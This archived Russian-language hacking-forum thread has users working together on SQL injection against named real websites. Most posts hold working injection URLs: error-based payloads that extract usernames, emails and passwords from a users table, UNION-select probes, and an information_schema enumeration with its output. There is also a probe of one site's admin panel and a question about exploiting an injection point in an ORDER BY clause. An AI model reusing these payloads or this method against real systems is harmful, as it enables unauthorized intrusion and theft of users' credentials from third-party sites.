ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.01.2012, 23:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+concat_ws(0x3a,name,email,password)+from+batterika_mysql.p_users+limit+1,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR]
http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+
таблица пуста
|
|
|
01.01.2012, 23:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Konqi
Konqi said:
http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+
таблица пуста
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
|
|
|
|
01.01.2012, 23:56
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от qaz
qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
Обязательно они там должны быть? может это админ такой хитрый.
P.S: а сам редактирует сайт через cpanel (я так думаю)
|
|
|
|
01.01.2012, 23:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
Возможно пароль админа хранится в config.php/admin.php/settings.php/etc. Как вариант, возможно, что скрипты для авторизации/регистрации подключены к другой БД. Вообщем сейчас посмотрю...
UPD. Смотрим админку
http://www.pitatel.ru/admin/
Код:
Code:
Access denied for user 'batterika'@'localhost' (using password: NO)
Нет коннекта. Смотрим текст:
Код:
Code:
C 14 июля 2011 года компания Pitatel вошла в группу компаний "Баттерика"!
Соответственно, сайт заброшен. БД с пассами админки не подключена...
|
|
|
|
02.01.2012, 00:00
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от qaz
qaz said:
ППц
если таблици test:jos_users и test:bak_users тоже пустые, ге тогда хранятся данные о юзерах???
table_rows в помощь
|
|
|
|
02.01.2012, 22:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+
я так понял, тут нет прямого вывода?
|
|
|
|
02.01.2012, 22:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от smirk
smirk said:
http://er-region.ru/about/department/index.php?id=139+and+1=2+union+select+1,2,3,4,5--+
я так понял, тут нет прямого вывода?
Код:
Code:
http://er-region.ru/about/department/index.php?id=13999999999999.9+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Все выводится через error-based. Смотрим исходник:
Код:
Code:
[Duplicate entry 'COLLATIONS1' for key 'group_key']
---
|
|
|
|
03.01.2012, 11:01
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
иньекция в запросе вида
SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]
есть у кого идеи как ее можно раскрутить?
метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...
|
|
|
|
03.01.2012, 11:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от [R
eD"]
[R]eD said:
иньекция в запросе вида
SELECT * FROM `users` WHERE `news_id` = 123 ORDER BY `news_date` [INJECTION]
есть у кого идеи как ее можно раскрутить?
метод что описан в https://forum.antichat.net/thread43966.html не подходит т.к. там иньекция в ORDER BY [INJECTION], в моем случае параметр уже задан...
Error-based, не?
|
|
|
|
03.01.2012, 11:26
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от Ereee
Ereee said:
Error-based, не?
вывод ошибок да, там есть, но иньекция ведь в последних параметрах как там такое провести?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?2962667){kind=avatar}
![Аватар для [R]eD](/avatars/avatar26157.jpg?2962681){kind=avatar}
Похожие темы
Линейный вид
